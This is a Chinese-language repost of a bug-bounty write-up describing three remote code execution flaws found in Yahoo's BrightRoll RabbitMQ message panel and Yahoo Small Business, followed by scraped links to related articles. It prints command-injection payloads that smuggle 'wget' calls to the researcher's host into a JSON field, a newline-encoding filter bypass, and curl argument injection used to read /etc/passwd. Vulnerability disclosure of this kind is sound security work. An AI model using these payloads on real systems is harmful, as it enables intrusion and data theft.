1. 程式人生 > >挖洞經驗 | 看我如何發現雅虎網站的3個RCE漏洞

挖洞經驗 | 看我如何發現雅虎網站的3個RCE漏洞

今天我要分享的是,我參與雅虎(Yahoo)漏洞賞金專案發現的3個RCE漏洞。雅虎漏洞測試範圍中涉及了很多服務應用,而我發現的漏洞就與雅虎的BrightRoll應用和中小企業服務相關。

BrightRoll 是雅虎旗下的獨立視訊廣告平臺,可通過 Web、移動和連線電視吸引廣泛受眾。2014年,雅虎以6.4億美元收購BrightRoll,此舉旨在加強雅虎面向營銷者實時銷售視訊廣告的能力,該公司將進一步在視訊廣告加大投入。有了BrightRoll,雅虎就能從各渠道分發視訊廣告,無需額外程式設計,這可以為雅虎在視訊廣告業務上與Google和Facebook的競爭中增添更多砝碼。BrightRoll技術每月收集並分析了數千億個數據點,實現了廣告客戶的實時決策並提高了投資回報率。

第一個RCE漏洞

專案一開始,我就用Google、Aquatone等工具進行一些前期踩點,恰好Aquatone跳出了一個有意思的埠頁面:

01.jpeg

好吧,我們來探究一下該頁面的具體功能,它貌似是用來執行RabbitMQ等服務應用的訊息佇列管理面板,當我點選了其中一個名為s3_adbox_setup的佇列之後,就跳到了以下頁面:

02.jpeg

RabbitMQ是實現了高階訊息佇列協議(AMQP)的開源訊息代理軟體(亦稱面向訊息的中介軟體)。RabbitMQ伺服器是用Erlang語言編寫的,而群集和故障轉移是構建在開放電信平臺框架上的。所有主要的程式語言均有與代理介面通訊的客戶端庫。

可以看到,這有一堆的訊息佇列,我點選右上角的“New Message”之後,出來了以下表格畫面,有點奇怪我也不知道這是什麼東東:

03.jpeg

為了建立一個新訊息,我就隨便在該表格中填了一些東西。在點選提交按鈕之後,就跳轉到了我新建立的訊息頁面,其中包含了一個視窗終端,但卻不能在裡面寫東西,其中只是跳出了一個錯誤訊息(抱歉這裡我忘了截圖)。

於是,我又回退到訊息佇列面板中,仔細觀察其中一個訊息在填寫區域的樣式,它好像是如同以下JSON格式的:

json:{“sub_bound”:true,”hostname”:”REDACTED”,”timestamp”:”2017/07/01/1649″,”s3_key”:”REDACTED”,”nop”:false,”providers”:[“Google”,”AWS”],”version”:3,”checkin_queue”:”REDACTED”,”type”:”REDACTED”,”interval_id”:”REDACTED”,”pod_id”:”22″}

我又按照該格式在引數1處建立了一個新訊息,提交跳轉後,出現了一個寫入JSON值字串的視窗終端:

04.jpeg

於是,我把向其中寫入了 “|wget mywebsite.com” 來請求測試我的網站,沒想到請求竟然能生效,

最終的測試Payload如下:

json:{“sub_bound”:true,”hostname”:”REDACTED”,”timestamp”:”2017/07/01/1649″,”s3_key”:”REDACTED”,”nop”:false,”providers”:[“Google”,”AWS”],”version”:3,”checkin_queue”:”REDACTED”,”type”:”REDACTED”,”interval_id”:”REDACTED”,”pod_id”:”22|wget http://myhost.name“}

PoC視訊:

第二個RCE漏洞

3個月後,我又在同一個雅虎的另外一臺伺服器中發現了和第一個RCE相同的應用,同樣的埠同樣的服務,但是最終測試Payload卻不生效,伺服器對 | & ; ` { } 字元作了過濾,經過一天的分析測試,我成功對其進行了繞過。漏洞技術和第一個RCE類似,我就不作過多披露,最後生效的Payload如下:

json:{“sub_bound”:true,”hostname”:”REDACTED”,”timestamp”:”2017/10/23/2248″,”s3_key”:”REDACTED”,”nop”:false,”providers”:[“Google”,”AWS”],”version”:3,”checkin_queue”:”REDACTED”,”type”:”REDACTED”,”interval_id”:”REDACTED”,”pod_id”:”23\u000awget\u0020 http://myhost.name“}

第三個RCE漏洞

這個漏洞要算一個有意思的發現了,它與雅虎中小企業服務(yahoo small business)相關,我反覆建立和測試了相關的產品功能之後,當我訪問其中的郵件模板頁面之後,AJAX會發送一些請求,去獲取頁面上顯示的產品圖片路徑,其中一個請求是以id引數形式,向objinfo_data.php發起的,而我覺得這個php指令碼功能是用來重置產品圖片大小的。當我建立了一個產品頁時,我注意到那個用於建立產品的請求中包含了幾個指向圖片的URLs,但其中卻沒有包含二進位制影象資料。我想,如果php指令碼直接獲得產品影象的連結並使用它來調整大小,會是什麼情況呢?那應該是SSRF吧。

為此,我重新編輯了產品頁,讓其圖片URL指向我執行有netcat和其它埠的測試主機,在我用該產品的id向objinfo_data.php發起請求後,netcat顯示了具體請求內容,而且其User-Agent方式為Curl,這樣一來,我就可以執行RCE了,但可惜最終還是不行,一番折騰過後,我的一位同事建議我,可以使用“-A something“之類的命令,而且如果在netcat中出現 “User-Agent: something”,則可能存在引數字串注入,我試了一下,竟然成功了!後來,我又用上了-T標記,並最終讀取到了/etc/passwd。一切竟在PoC視訊中:

,FreeBuf 小編 clouds 編譯,轉載請註明來自 FreeBuf.COM

相關推薦

經驗 | 如何發現網站3RCE漏洞

今天我要分享的是,我參與雅虎(Yahoo)漏洞賞金專案發現的3個RCE漏洞。雅虎漏洞測試範圍中涉及了很多服務應用,而我發現的漏洞就與雅虎的BrightRoll應用和中小企業服務相關。BrightRoll 是雅虎旗下的獨立視訊廣告平臺,可通過 Web、移動

【轉載i春秋】補天經驗

alt ava pos 執行 ron 更改 圖片地址 tps 下載 轉載自: 補天付費廠商漏洞挖掘小技巧 補天不收的漏洞 補天付費廠商漏洞挖掘小技巧 1、子域名收集 不要想著去擼主站,主站一出來幾乎被人輪了個遍,跟大牛搶肉吃,難,放棄。 所以我們一般都是

網站頁面效能優化的34條黃金守則

雅虎團隊經驗:網站頁面效能優化的34條黃金守則 目錄 6、預載入  1、儘量減少HTTP請求次數       終端使用者響應的

人人都能懂的機器學習!3案例詳解聚類、迴歸、分類演算法

導讀:機器是怎樣學習的,都學到了什麼?人類又是怎樣教會機器學習的?本文通過案例給你講清楚各類演算

[轉載]團隊經驗網站頁面效能優化的34條黃金守則

最近在看HTTP相關的內容,偶然看到一篇不錯的博文,現分享給大家。   雅虎團隊經驗:網站頁面效能優化的34條黃金守則1、儘量減少HTTP請求次數      終端使用者響應的時間中,有80%用於下載各項內容。這部分時間包括下載頁面中的影象、樣式表

分析了嗅網5萬篇文章,發現這些祕密

本文轉自:https://mp.weixin.qq.com/s?__biz=MzAxMjUyNDQ5OA==&mid=2653558174&idx=1&sn=4f4c1b389a92bf43c4142736f908fddc&chksm=806e3b23b71

自學Python一年,了幾十本書,發現了這些捷徑!

  今天給大家分享一位前輩自學Python的過程。當然,他自己本身就有程式設計基礎,與完全沒基礎的小白不可同日而語。大家可以相對借鑑一下他的學習方法,如果是純小白入門,還是需要老師帶領學習。     最初瞭解python語言是由於2016年一次

完你就知道什麼是 HTTPS 了------其實發現很多人不懂https, 包括!所以來學下這篇佳作!

什麼是 HTTPS ? 不管是使用手機還是電腦上網,都離不開資料的通訊 現在網際網路上傳輸資料,普遍使用的是超文字傳輸協議,即 HTTP (HyperText Transfer Protocol) 所以,我們以前在上網的時候,會發現所有的網址都一個 http:// 字首: HTTP 協議 簡單而言,HTT

【每日安全資訊】新手上路 | 如何發現大疆公司網站的一個小漏洞

本文中,孟加拉國安全研究者Yeasir Arafat講述了他對大疆無人機公司的一次漏洞測試,其通

專案管理PMP的備考經驗分享,是如何60天考過PMP的?

最好的學習方式就是不斷的輸出分享,然後在從別人的想法中瞭解一些不同的觀點是我們要學習的。講講一位在我們社群裡考過5A學員的在校經歷吧,供大家參考。本人是17年12月份參加的pmp考試,很幸運以4A1T的成績通過了考試。先說我自己吧,經常在外出差,備考的時間並不是很多,總共加起

前端開發的優化問題( 14 條效能優化原則)

(1) 減少 http 請求次數:CSS Sprites, JS、CSS 原始碼壓縮、圖片大小控制合適;網頁Gzip,CDN 託管,data 快取 ,圖片伺服器。 (2)前端模板 JS+資料,減少由於 HTML 標籤導致的頻寬浪費,前端用變數儲存 AJAX請求結果,每次操作

[經驗] -- PHP團隊開發中遇到的那些坑,是如何解決的?

坑一 : 團隊開發中,每個人都有自己擅長的整合環境,比如WAMP、AppServ、XAMPP,正是因為這些環境不統一,完成任務提交程式碼後,每當測試出BUG的時候,都會有 “程式碼在我機子上執行沒有問題” 的說辭。那麼問題來了,如何解決這個問題? 如何統一開發環境? 我

軍規34條 (一)

ron 導航條 情況 合成 樣式表 圖片 mage 通過 arch 1.減少HTTP請求:合並文件 80%的用戶響應時間被花費在前端,而這其中的絕大多數時間是用於下載頁面中的圖片、樣式表、腳本以及Flash這些組件。減少這些組件的數量就可以減少展示頁面所需的請求數,而這是提

前端性能優化

合並文件 每次 腳本文件 res develop 空白字符 空字符 num nts 1.盡量減少HTTP請求數   80%的終端用戶響應時間都花在了前端上,其中大部分時間都在下載頁面上的各種組件:圖片,樣式表,腳本,Flash等等。減少組件數必然能夠減少頁面提交的HTTP請

[邏輯漏洞]記錄一次

9.png 列表 一次 查詢 urn 找到 ima sting .com 陽光明媚的早上,turn on the PC and 隨意地瀏覽著以往漏洞列表,希望在裏面找到一些遺忘的痕跡。 果然,我發現一個被忽略的漏洞,一個暴露在外網的的一個接口,可以查詢該企業網站是否註冊了的

利用ycsb對cassandra做性能測試

cto ted eml form 1.0 dev 用戶控制 宋體 password 準備: 環境: 兩臺虛擬機:ip:192.168.138.128/129;配置:2核4G; 版本:apache-cassandra-3.10    ycsb-cassandra-bin

時常被黑客攻擊,如何做好防禦?

添加 可能 exe col net 日誌 sys 文本 table 前言:習慣性每天都看阿裏雲日誌,發現有個IP每天都來嘗試攻擊我服務器,然後就有了下文。 X.X.X.78這個IP地址,每天都來嘗試搞我服務器。當然,咱們也不能慫,對吧? 通過直接訪問IPX.X.X.78得

JavaScript--發現,原來你是這樣的JS(初識、源泉)

pac 發現 .com -- rip php script album 原來 http://pic.cnhubei.com/space.php?uid=4614&do=album&id=1384727http://pic.cnhubei.com/space.

做了8年電商 發現這6種靠譜的電商運營管理思維

運營經歷過PC互聯網到移動互聯網,見證過B2C的興衰起落,操盤過淘寶京東,體驗了移動電商,帶過80後、90後甚至70後,我發現人與人之間真是有差異的,有人做電商2年從專員升級到主管經理,有人還一直奮鬥在專員。做電商的同學都知道,只要認真做1年的電商運營,像商品、活動、策劃、溝通和協調這些技術能力,都基本學會了

軍規以及Chrome調試

get請求 最佳實踐 說明文檔 試圖 cache 靜態圖 order 推出 自己 1.盡量減少HTTP請求數   80%的終端用戶響應時間都花在了前端上,其中大部分時間都在下載頁面上的各種組件:圖片,樣式表,腳本,Flash等等。減少組件數必然能夠減少頁面提交的HTTP請求